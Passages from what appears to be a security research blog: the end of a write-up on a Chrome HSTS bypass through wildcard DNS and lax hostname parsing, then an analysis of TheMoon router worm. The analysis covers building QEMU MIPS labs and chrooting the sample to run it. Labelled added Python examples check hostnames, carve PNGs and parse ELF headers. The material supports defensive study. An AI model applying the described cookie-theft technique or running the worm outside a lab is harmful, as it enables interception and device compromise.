<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR5SCzjMUKsQbS5Dn_Cr3E-2KhDswCdP4AY3s8zP8TT9PJ-uTdHjps__iDOCHMgQnEuMZsNZlKc2BifDTcQBeB2ts_lWKSQjqJKZOpar416FKJ42uhJnZITiQh3vfjVv5V8u6bwkEIt2me/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR5SCzjMUKsQbS5Dn_Cr3E-2KhDswCdP4AY3s8zP8TT9PJ-uTdHjps__iDOCHMgQnEuMZsNZlKc2BifDTcQBeB2ts_lWKSQjqJKZOpar416FKJ42uhJnZITiQh3vfjVv5V8u6bwkEIt2me/s1600/1.PNG" height="604" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkh7YF2XCwPMGdRRznA_yY5y7O3LBmuYz9q-C2ZeJidibJc6lkQew1PyWUcLaxfxDbym5yc-yWiOMGMR5FCQqjNVyK8MIxpTVHQxq5LNu5EVVVG2EbTNOlbJZS0FMBOQpzRJLewd4G_Td0/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkh7YF2XCwPMGdRRznA_yY5y7O3LBmuYz9q-C2ZeJidibJc6lkQew1PyWUcLaxfxDbym5yc-yWiOMGMR5FCQqjNVyK8MIxpTVHQxq5LNu5EVVVG2EbTNOlbJZS0FMBOQpzRJLewd4G_Td0/s1600/2.PNG" height="602" width="640" /></a></div>
<br />
It's worth mentioning that when you issue a wildcard certificate for your host, it will be valid for a single level only. Certificates issued to *.google.com should not be trusted when used on domains like abc.def.google.com.<br />
<br />
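As an added example (not code from the original post), here are the three host-name checks that the crafted URL above and the wildcard-certificate remark exercise: strict RFC 1123 syntax (the kind of check a strict component such as TransportSecurityState applies), RFC 6265 cookie domain-matching (a plain label-suffix match that never looks at syntax), and single-label wildcard matching for certificate names. The cookie domain drive.google.com and the *.google.com certificate name are assumptions chosen for the demonstration.

```python
"""Host-name checks behind the wildcard-DNS issue (added example, not from the post)."""
import re

# One DNS label: 1..63 chars of letters, digits and hyphens, no leading/trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def rfc1123_valid(host: str) -> bool:
    """Strict hostname syntax. A label such as 'com---' or 'www-' fails here,
    which is why a strict parser rejected these names while looser ones did not."""
    host = host.rstrip(".")
    if not host or len(host) > 253:
        return False
    return all(_LABEL.match(label) for label in host.split("."))


def cookie_domain_match(host: str, cookie_domain: str) -> bool:
    """RFC 6265 section 5.1.3 domain-matching: the request host equals the cookie
    domain or ends with it at a label boundary. No syntax check is involved."""
    host = host.lower().rstrip(".")
    cookie_domain = cookie_domain.lower().strip(".")
    return host == cookie_domain or host.endswith("." + cookie_domain)


def wildcard_cert_match(host: str, cert_name: str) -> bool:
    """RFC 6125 style matching of a certificate DNS name: a '*' label matches
    exactly one label, so *.google.com covers abc.google.com but not abc.def.google.com."""
    host_labels = host.lower().rstrip(".").split(".")
    cert_labels = cert_name.lower().rstrip(".").split(".")
    if len(host_labels) != len(cert_labels):
        return False
    return all(c == "*" or h == c for h, c in zip(host_labels, cert_labels))


def assess(host: str, cookie_domain: str, cert_name: str) -> dict:
    """Bundle the three checks, as a defender auditing whether a wildcard DNS
    entry plus a lax hostname parser lets an attacker-controlled name inherit
    another origin's cookies or certificate would."""
    return {
        "valid_hostname": rfc1123_valid(host),
        "receives_cookies_of": cookie_domain_match(host, cookie_domain),
        "covered_by_cert": wildcard_cert_match(host, cert_name),
    }


if __name__ == "__main__":
    # The crafted name from the post against an assumed cookie domain and wildcard cert.
    crafted = "www.example.com---.drive.google.com"
    for name in (crafted, "drive.google.com", "abc.def.google.com", "www-.sites.google.com"):
        print(name, assess(name, "drive.google.com", "*.google.com"))
```

The crafted name is rejected by the strict check but still domain-matches the drive.google.com cookie domain, which is the gap the post describes; the wildcard check also shows why a *.google.com certificate must not cover it.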
The hardcoded list of domains and pinned certificates from Chrome can be found here:<br />
<br />
- <a href="https://src.chromium.org/viewvc/chrome/trunk/src/net/http/transport_security_state_static.json">https://src.chromium.org/viewvc/chrome/trunk/src/net/http/transport_security_state_static.json</a><br />
<br />
During my analysis, I found that 55 out of 397 domains with Transport Security enabled had wildcard entries in their DNS. A nation-sponsored attacker with a <a href="https://twitter.com/lucabruno/status/450239917000781825">valid and trusted CA</a> could simply MITM your traffic and inject requests to these invalid domains, circumventing the HSTS policies and stealing session cookies, for example.<br />
<br />
Google did not assign a CVE for the bug, but fixed it within a couple of weeks. Chrome 32 and 33+ (the version that changed the SSL warning from red to yellow) are not affected by this issue.<br />
<br />
In times of <a href="https://www.imperialviolet.org/2014/02/22/applebug.html">Goto fails</a>, it was really interesting to follow the Chromium tracker, their internal discussions, the tests performed and so on. The commits fixing these issues can be found <a href="https://codereview.chromium.org/54623005/">here</a>.<br />
<br />
<b>Conclusion</b><br />
<br />
Google and Facebook security teams were both great to deal with. The bug was quite fun as well because it was different from the traditional OWASP Top 10 issues.<br />
<br />
And because the industry totally <a href="http://blog.secureideas.com/2013/09/industry-issues-new-vulnerabilities-and.html">needs new Vulnerability terminologies</a>, anyone willing to refer to these attacks shall name them Advanced Persistent Cross Site Wildcard Domain Header Poisoning (or simply APCSWDHP).<br />
<br />
In case you're from NSA and want to use this technique to implant our DNS's, please use the codename CRAZY KOALA so we could better track them when the next Snowden leaks your documents.<br />
<br />Bernardo Rodrigues (http://www.blogger.com/profile/09470949514402700579)<br />
<br />
<b>Analyzing Malware for Embedded Devices: TheMoon Worm</b> (published 2014-02-17, updated 2014-02-18)<div>
All the media outlets are reporting that Embedded Malware is becoming mainstream. This is something <a href="http://dronebl.org/blog/8">totally new</a> and we <a href="http://internetcensus2012.bitbucket.org/paper.html">never heard of this before</a>, right? The high number of Linux SOHO routers with Internet-facing administrative interfaces, the lack of firmware updates and the ease of crafting exploits make them a perfect target for online criminals. The <a href="http://blog.ioactive.com/2014/02/internet-of-threats.html">Internet of Threats is wildly insecure</a>, but definitely not unpatchable.</div>
<div>
<br /></div>
<div>
To all infosec people out there, it's important to understand these threats and report them properly to the media. Some top-notch researchers recently uncovered "Massive Botnets" infecting refrigerators, microwaves, gaming consoles, soda machines and tamagotchis. The problem is that they never provided any sort of evidence, no malware samples, no IOCs, and did not write a <a href="http://attrition.org/errata/charlatan/hakin9/hakin9-nmap-ebook-ch1.pdf">Hakin9 article</a> describing it.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdgBF8zLF2t8wtF0TarU9sAYTJ-Pkt2nwCSWLh4LDebaN-Wu_msi1Bj4H059Kq7WfHAy__3ycEnR-PDbmX7AwO4I9gBysvK9yvTpuRpxHOh8sxi_xVUNCkw948tBdXEMeBwJPJ_0S0Dtoi/s1600/routerz.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdgBF8zLF2t8wtF0TarU9sAYTJ-Pkt2nwCSWLh4LDebaN-Wu_msi1Bj4H059Kq7WfHAy__3ycEnR-PDbmX7AwO4I9gBysvK9yvTpuRpxHOh8sxi_xVUNCkw948tBdXEMeBwJPJ_0S0Dtoi/s1600/routerz.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: start;">Refrigerator Botnet? Revd. Pastor Laphroaig says <a href="https://archive.org/details/Pocorgtfo02">Show the PoC || GTFO</a></span></td></tr>
</tbody></table>
<br />
<div>
The aim of this post is to provide more information on identifying and executing embedded binaries, describing how to set up your own virtual lab. In case you missed it, head to the first post from the "<a href="http://w00tsec.blogspot.com.br/2013/09/analyzing-and-running-binaries-from.html">Analyzing and Running binaries from Firmware Images</a>" series.</div>
<div>
<br /></div>
<div>
<b>TheMoon Worm</b></div>
<div>
<br /></div>
<div>
<a href="https://twitter.com/johullrich">Johannes</a> from SANS provided me with a sample of the "TheMoon" malware and posted some interesting information in their <a href="https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630">handler's diary</a>. Their honeypots captured the scanning activity and <a href="https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633">linked the exploit</a> to a vulnerable CGI script running on specific firmwares of the following Linksys routers: E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900.<br />
<br />
SANS handlers classified TheMoon as a worm because of the self-replicating nature of the malware. The worm requests an "HNAP1" URL to fingerprint and identify potentially vulnerable routers. If you check your firewall and server logs you may find lots of different IPs probing this URL.<br />
<br />
The worm got its name because it contains images from the movie "The Moon". It's possible to carve a few PNGs out of the ELF binary:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEoKL3kCkrCclEosMQRoIflCIplhNfgWofQW15ObPSZthjDHCKDLOvvgrUxe-eGhJIdTNUEGYo22-llhn3LrMckHIpXuQMH3er1PcXYzK2RdVaXWNP9vAEfZ5w5lH6iyhxOQtzfk-oQGTS/s1600/shtt.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEoKL3kCkrCclEosMQRoIflCIplhNfgWofQW15ObPSZthjDHCKDLOvvgrUxe-eGhJIdTNUEGYo22-llhn3LrMckHIpXuQMH3er1PcXYzK2RdVaXWNP9vAEfZ5w5lH6iyhxOQtzfk-oQGTS/s1600/shtt.PNG" height="276" width="320" /></a></div>
<div>
<br /></div>
</div>
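As an added example (not code from the original post), this is the carving step above done by hand: scan a binary for the PNG signature and walk the chunk chain, validating every chunk CRC, so that a stray occurrence of the eight signature bytes is rejected instead of producing junk. The "ELF" blob, the GERTY filler and the two embedded images are constructed inline; the file names and sizes are not those of the real sample.

```python
"""Carve structurally valid PNG images out of an arbitrary binary (added example)."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Build one PNG chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def _png_end(blob: bytes, start: int):
    """Walk chunks from a signature at `start`; return the offset just past IEND,
    or None if the chain is malformed (no IHDR first, bad length, bad CRC, no IEND)."""
    p = start + len(PNG_SIG)
    first = True
    while p + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[p:p + 8])
        if first and ctype != b"IHDR":
            return None
        first = False
        data_end = p + 8 + length
        if data_end + 4 > len(blob):
            return None
        data = blob[p + 8:data_end]
        crc = struct.unpack(">I", blob[data_end:data_end + 4])[0]
        if crc != (zlib.crc32(ctype + data) & 0xFFFFFFFF):
            return None
        p = data_end + 4
        if ctype == b"IEND":
            return p
    return None


def carve_pngs(blob: bytes) -> list:
    """Return (offset, png_bytes) for every valid PNG found in blob, in order."""
    found = []
    pos = blob.find(PNG_SIG)
    while pos != -1:
        end = _png_end(blob, pos)
        if end is None:
            pos = blob.find(PNG_SIG, pos + 1)  # decoy signature: keep scanning
            continue
        found.append((pos, blob[pos:end]))
        pos = blob.find(PNG_SIG, end)
    return found


def make_sample_png(width: int, height: int) -> bytes:
    """Constructed 8-bit grayscale PNG with all-zero pixels, valid per the spec."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    raw = b"".join(b"\x00" + b"\x00" * width for _ in range(height))  # filter byte 0 per row
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def build_sample_blob() -> bytes:
    """Constructed stand-in for the ELF: padding, two real PNGs, and a decoy
    signature followed by garbage instead of chunks."""
    return (b"\x7fELF" + b"\x00" * 60
            + make_sample_png(2, 2)
            + b"GERTY" * 7
            + PNG_SIG + b"\xff" * 16   # decoy: signature with no valid IHDR behind it
            + make_sample_png(3, 1)
            + b"\x00" * 32)


if __name__ == "__main__":
    for off, png in carve_pngs(build_sample_blob()):
        w, h = struct.unpack(">II", png[16:24])  # width/height live in IHDR data
        print(f"PNG at offset {off}: {len(png)} bytes, {w}x{h}")
```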
<div>
<b>Identifying the Binary</b></div>
<div>
<br />
A total of seven different samples were provided; they all seem to be variants of the same malware, judging by the ssdeep matching score.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDhTHp27D3YDa0amPkxVHcjIyOyGMR6UObYbRwJouV9zMuKO1Ll5qFTJgExF4OymZimXte50coy0k5kcKDqbrWltHQODwOcd18PHIGHwlWBFPAEpidO2rrhS0rzOaFJevDMxdmt05SCT89/s1600/Screenshot+from+2014-02-15+23%5E%2516%5E%2555.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDhTHp27D3YDa0amPkxVHcjIyOyGMR6UObYbRwJouV9zMuKO1Ll5qFTJgExF4OymZimXte50coy0k5kcKDqbrWltHQODwOcd18PHIGHwlWBFPAEpidO2rrhS0rzOaFJevDMxdmt05SCT89/s1600/Screenshot+from+2014-02-15+23%5E%2516%5E%2555.png" height="346" width="640" /></a></div>
<br />
Let's start by running the file utility and readelf to identify the architecture (MIPS R3000 / Little Endian):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW5TRNaB4JUdp6DVTBfI4NSlHL1UmGTD9g2ZWbqBj1271ioxm61nh988wEYH-yrjjCgOFdK0vViXrb5r71NVx2IQAQImOGcSDEIxqq2AYMW8sOK60JMpMRP9tRa3x2cikBERZZqmdJKcoc/s1600/Screenshot+from+2014-02-15+23%255E%252519%255E%252508.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW5TRNaB4JUdp6DVTBfI4NSlHL1UmGTD9g2ZWbqBj1271ioxm61nh988wEYH-yrjjCgOFdK0vViXrb5r71NVx2IQAQImOGcSDEIxqq2AYMW8sOK60JMpMRP9tRa3x2cikBERZZqmdJKcoc/s1600/Screenshot+from+2014-02-15+23%255E%252519%255E%252508.png" height="410" width="640" /></a></div>
<br /></div>
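As an added example (not code from the original post), a minimal ELF header parser that answers the same questions as the file and readelf run above: class, byte order, target machine and, for MIPS, the ISA level encoded in e_flags (mips1 is the R3000-class level). The constants come from the ELF specification and the MIPS ABI supplement; the header bytes, entry point and offsets are constructed to resemble a little-endian MIPS-I executable and are not taken from the real sample.

```python
"""Identify ELF class, endianness, machine and MIPS ISA level (added example)."""
import struct

ELF_MAGIC = b"\x7fELF"
EI_CLASS, EI_DATA = 4, 5
ELFCLASS32, ELFCLASS64 = 1, 2
ELFDATA2LSB, ELFDATA2MSB = 1, 2
ET_EXEC, ET_DYN = 2, 3
EM_386, EM_MIPS, EM_ARM, EM_X86_64, EM_AARCH64 = 3, 8, 40, 62, 183
MACHINE_NAMES = {EM_386: "x86", EM_MIPS: "MIPS", EM_ARM: "ARM",
                 EM_X86_64: "x86-64", EM_AARCH64: "AArch64"}
# MIPS e_flags: the top nibble (EF_MIPS_ARCH) encodes the ISA level.
EF_MIPS_ARCH = 0xF0000000
MIPS_ARCH_NAMES = {0x00000000: "mips1", 0x10000000: "mips2", 0x20000000: "mips3",
                   0x30000000: "mips4", 0x40000000: "mips5", 0x50000000: "mips32",
                   0x60000000: "mips64", 0x70000000: "mips32r2", 0x80000000: "mips64r2"}
EF_MIPS_NOREORDER, EF_MIPS_PIC, EF_MIPS_CPIC = 0x1, 0x2, 0x4


def parse_elf_header(data: bytes) -> dict:
    """Parse e_ident plus the fixed leading fields of an ELF32/ELF64 header."""
    if len(data) < 16 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    cls, order = data[EI_CLASS], data[EI_DATA]
    if cls not in (ELFCLASS32, ELFCLASS64) or order not in (ELFDATA2LSB, ELFDATA2MSB):
        raise ValueError("unsupported ELF class or byte order")
    endian = "<" if order == ELFDATA2LSB else ">"
    # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags (addresses widen on ELF64)
    fmt = endian + ("HHIIIII" if cls == ELFCLASS32 else "HHIQQQI")
    size = 16 + struct.calcsize(fmt)
    if len(data) < size:
        raise ValueError("truncated ELF header")
    e_type, e_machine, _, e_entry, _, _, e_flags = struct.unpack(fmt, data[16:size])
    info = {
        "bits": 32 if cls == ELFCLASS32 else 64,
        "endian": "little" if order == ELFDATA2LSB else "big",
        "type": {ET_EXEC: "EXEC", ET_DYN: "DYN"}.get(e_type, f"0x{e_type:x}"),
        "machine": MACHINE_NAMES.get(e_machine, f"unknown(0x{e_machine:x})"),
        "entry": e_entry,
        "flags": e_flags,
    }
    if e_machine == EM_MIPS:
        info["mips_isa"] = MIPS_ARCH_NAMES.get(e_flags & EF_MIPS_ARCH, "unknown")
    return info


def describe(data: bytes) -> str:
    """One-line summary in the spirit of `file`."""
    h = parse_elf_header(data)
    isa = f", {h['mips_isa']}" if "mips_isa" in h else ""
    return (f"ELF {h['bits']}-bit {h['endian']}-endian {h['machine']} {h['type']}"
            f"{isa}, entry 0x{h['entry']:x}")


def build_sample_header(little_endian: bool = True) -> bytes:
    """Constructed 52-byte ELF32 MIPS executable header (no program follows it):
    mips1 ISA with the usual noreorder/pic/cpic flags; entry point and table
    offsets are placeholder values."""
    order = ELFDATA2LSB if little_endian else ELFDATA2MSB
    e_ident = ELF_MAGIC + bytes([ELFCLASS32, order, 1, 0]) + b"\x00" * 8
    e_flags = 0x00000000 | EF_MIPS_NOREORDER | EF_MIPS_PIC | EF_MIPS_CPIC
    pack = "<" if little_endian else ">"
    # e_type e_machine e_version e_entry e_phoff e_shoff e_flags e_ehsize e_phentsize e_phnum e_shentsize e_shnum e_shstrndx
    return e_ident + struct.pack(pack + "HHIIIIIHHHHHH",
                                 ET_EXEC, EM_MIPS, 1, 0x00400260, 52, 0, e_flags,
                                 52, 32, 0, 40, 0, 0)


if __name__ == "__main__":
    print(describe(build_sample_header(True)))   # the post's sample: MIPS, little-endian
    print(describe(build_sample_header(False)))  # the big-endian case used by OpenWRT later on
```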
<div>
The EXr.pdf variant (MD5 88a5c5f9c5de5ba612ec96682d61c7bb) had a <a href="https://www.virustotal.com/en/file/1ef6b45a2e5e6b547df2f5672bf48ebfd2720ffa8eed308010fb90f6fd8d79b6/analysis/1392517591/">VirusTotal Detection Rate of 3 / 50</a> on 2014-02-16.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2SA9G0XdBrI0uDhLMGr1uq3w7KCdCd2QOHfoq319LEYn7OEShgvxYJps1TF9yogkASHiIvUva-O80phUAEjs9-wZ95_JL789tC3718oQ23PBWIdc0HMI74WN6qfqWNJBCgqQv3b8JCl3d/s1600/vt.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2SA9G0XdBrI0uDhLMGr1uq3w7KCdCd2QOHfoq319LEYn7OEShgvxYJps1TF9yogkASHiIvUva-O80phUAEjs9-wZ95_JL789tC3718oQ23PBWIdc0HMI74WN6qfqWNJBCgqQv3b8JCl3d/s1600/vt.PNG" height="331" width="640" /></a></div>
<br />
<br />
<b>QEMU</b></div>
<div>
<br />
We'll be using QEMU to run the binaries in a controlled environment. I commonly use two different setups to run MIPS Linux binaries, both based on the <a href="https://dev.openwrt.org/wiki/malta">Malta</a> platform.<br />
<br />
<b>OpenWRT MIPS</b><br />
<br />
The OpenWRT Malta CoreLV platform is intended to be used with QEMU (in big- or little-endian mode). The install procedure is pretty straightforward using <a href="http://wiki.openwrt.org/doc/howto/buildroot.exigence">OpenWRT Buildroot</a>. OpenWrt Buildroot is the build system for the distribution and it works on Linux, BSD or MacOSX. In case you don't remember, the authors of the <a href="http://internetcensus2012.bitbucket.org/paper.html">Carna Botnet</a> used it to cross-compile its binaries.<br />
<br />
Installing prerequisites (on your favorite <a href="http://anonscm.debian.org/gitweb/?p=collab-maint/debmirror.git;a=commitdiff;h=fcd972395b0201fcde4915d282982926f0d04c56;hp=7fcdf0d225c480b386c5a1f487e68dc39b57e771">Debian Derivative</a>):<br />
<br />
<script src="https://gist.github.com/bmaia/9042465.js"></script>
Now head to the openwrt folder and set the proper settings for your Linux Kernel, choosing "MIPS Malta CoreLV board (qemu)" for the Target System and "Little Endian" for the subtarget. Don't forget to save the config.<br />
<br />
<script src="https://gist.github.com/bmaia/9042489.js"></script><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6zcmFtobY9C85J6v1x0SxgsFhz-ZfFhL0kDho2S4uQdWnQXFvnJtvb4KNzQ3hSjzMQVyxMTLllwgBR2sAgzigWTmBibsZT_0FyY0qyHJmjJAj5CfgyuQA_hiAXS41b3isNIYrTZcjQfE6/s1600/Screenshot+from+2014-02-16+01%5E%2552%5E%2552.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6zcmFtobY9C85J6v1x0SxgsFhz-ZfFhL0kDho2S4uQdWnQXFvnJtvb4KNzQ3hSjzMQVyxMTLllwgBR2sAgzigWTmBibsZT_0FyY0qyHJmjJAj5CfgyuQA_hiAXS41b3isNIYrTZcjQfE6/s1600/Screenshot+from+2014-02-16+01%5E%2552%5E%2552.png" height="419" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ3cMXVI4jEG3zDr6CNHQBcsNsAI8uFRvY8HwBu-A3tuyb5vU2pzem7IaESVUxWi_rCBefYffUgVrmKE9fwgZVo6-rvUdZPH5Y0N2B1UElrWW9F31V8y1D5l1dj28O3btFhyXKmLHDvQzl/s1600/Screenshot+from+2014-02-16+01%5E%2553%5E%2508.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ3cMXVI4jEG3zDr6CNHQBcsNsAI8uFRvY8HwBu-A3tuyb5vU2pzem7IaESVUxWi_rCBefYffUgVrmKE9fwgZVo6-rvUdZPH5Y0N2B1UElrWW9F31V8y1D5l1dj28O3btFhyXKmLHDvQzl/s1600/Screenshot+from+2014-02-16+01%5E%2553%5E%2508.png" height="420" width="640" /></a></div>
<br />
Now <a href="http://wiki.openwrt.org/doc/howto/build">build your image</a> (use the -j switch to speed up the build if you have multiple cores, e.g. "-j 3"):<br />
<br />
<script src="https://gist.github.com/bmaia/9042500.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmqk1fnptPzy0XPjDif6M8-2yP0W-9fqQSLKhnZZ9vOT74tXD4bDjK0TVtWRyITscp4NVH_RipgjKVJxQTromFexXlpYNmA9KMd4ol6ONety5dyDpta_Dfy-07UoydxYJfl6JbWazAiDrt/s1600/Screenshot+from+2014-02-16+02%5E%2500%5E%2516.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmqk1fnptPzy0XPjDif6M8-2yP0W-9fqQSLKhnZZ9vOT74tXD4bDjK0TVtWRyITscp4NVH_RipgjKVJxQTromFexXlpYNmA9KMd4ol6ONety5dyDpta_Dfy-07UoydxYJfl6JbWazAiDrt/s1600/Screenshot+from+2014-02-16+02%5E%2500%5E%2516.png" height="403" width="640" /></a></div>
<br /></div>
<div>
Your image will be ready after a couple of minutes. Now you need to install the QEMU full-system emulation binaries and start them with the right command switches:<br />
<br />
<script src="https://gist.github.com/bmaia/9042808.js"></script></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS2PDVKZE9osgW4JkQLoAmZrYeUI0S77AGSCGTKunMMOOXpvHrJWNmYkDbeta_TtXQOkpaV2d7kB8x_Ou5OxJUUwy6WA1_NOukBwnDsuac6KvQwGrztJKpc9uXlllXUYXQWc2nAxSJahKl/s1600/Screenshot+from+2014-02-16+03%5E%2558%5E%2540.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS2PDVKZE9osgW4JkQLoAmZrYeUI0S77AGSCGTKunMMOOXpvHrJWNmYkDbeta_TtXQOkpaV2d7kB8x_Ou5OxJUUwy6WA1_NOukBwnDsuac6KvQwGrztJKpc9uXlllXUYXQWc2nAxSJahKl/s1600/Screenshot+from+2014-02-16+03%5E%2558%5E%2540.png" height="372" width="640" /></a></div>
<div>
<br /></div>
<div>
To exit the console simply hit CTRL+A followed by C and Q.<br />
<br />
If you want to connect your emulated machine to a real network, follow the steps from <a href="http://www.aurel32.net/info/debian_mips_qemu.php">Aurelien's Blog</a> or simply run the following commands to get Internet access:<br />
<br />
<script src="https://gist.github.com/bmaia/9042823.js"></script>
If you don't want to compile the Kernel by yourself, you can grab the pre-compiled binaries from <a href="http://downloads.openwrt.org/attitude_adjustment/12.09-rc1/malta/generic/">here</a> or <a href="http://www.cpe.ku.ac.th/~aphirak/malta/">here</a> (at your own risk).<br />
<br />
You may remember that it was not possible to run <a href="http://w00tsec.blogspot.com.br/2013/09/analyzing-and-running-binaries-from.html">busybox-simet</a> using the standalone qemu-mips-static. It's possible to fix that by manually patching QEMU or you can run it inside the proper virtual machine (OpenWRT Malta MIPS/Big Endian):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9kBOxXgFSJ6JZH67soSDhrThA8Pyr6uE5Y1dTZNxyNMkX0BdhtyrD6L7JrkrdQ9z5h_xToP_eKXWHmOvHOBAUKL-8BkuEBOLLpGHJr8v1UgACQVpyDKnrmmsMV68FO5fmZ73WcAIxjGXT/s1600/Screenshot+from+2014-02-16+04%5E%2518%5E%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9kBOxXgFSJ6JZH67soSDhrThA8Pyr6uE5Y1dTZNxyNMkX0BdhtyrD6L7JrkrdQ9z5h_xToP_eKXWHmOvHOBAUKL-8BkuEBOLLpGHJr8v1UgACQVpyDKnrmmsMV68FO5fmZ73WcAIxjGXT/s1600/Screenshot+from+2014-02-16+04%5E%2518%5E%2529.png" height="372" width="640" /></a></div>
<br /></div>
<div>
<b>Debian MIPS Linux</b></div>
<div>
<br />
I won't describe how to set up your Debian MIPS Linux because <a href="https://twitter.com/zcutlip">Zach Cutlip</a> already did an amazing job describing it in <a href="http://shadow-file.blogspot.com.br/2013/05/running-debian-mips-linux-in-qemu.html">this blog post</a>. The process is quite similar to the OpenWRT one and if you're too lazy to build your own environment, <a href="http://www.aurel32.net/">Aurelien</a> provides pre-compiled binaries <a href="http://people.debian.org/~aurel32/qemu/mipsel/">here</a>. Don't forget to set up your network connections properly.<br />
<br />
<b>Dynamic Analysis</b><br />
<br />
In order to emulate the Linksys Environment, let's download and unpack the Firmware from E2500v2 (v1.0.07).<br />
<br />
<script src="https://gist.github.com/bmaia/9042835.js"></script>
Let's copy and extract the root filesystem (e2500.tar.gz) and the malicious binary (EXr.pdf) to our test machine (Debian MIPS). Remember to copy the worm to the appropriate "/tmp" folder. Back up your QEMU image, start sniffing the connections on the bridged network (tap1 in my case) and bind the necessary pseudo-devices into the chrooted path. You can run the binary directly on your Debian MIPS environment, but using chroot and the target filesystem is highly recommended. If you try to chroot and run the worm without linking these devices, it will refuse to run and it won't drop the second-stage binary.<br />
<br />
<script src="https://gist.github.com/bmaia/9042842.js"></script>
You can use strace to log the syscalls and start your chrooted shell to run the malicious binary. I had some issues using strace on the 2.6.32 Debian MIPS Kernel (vmlinux-2.6.32-5-4kc-malta). The 3.2.0 (vmlinux-3.2.0-4-4kc-malta) version seems to be running fine.<br />
<br /></div>
<div>
<script src="https://gist.github.com/bmaia/9042862.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
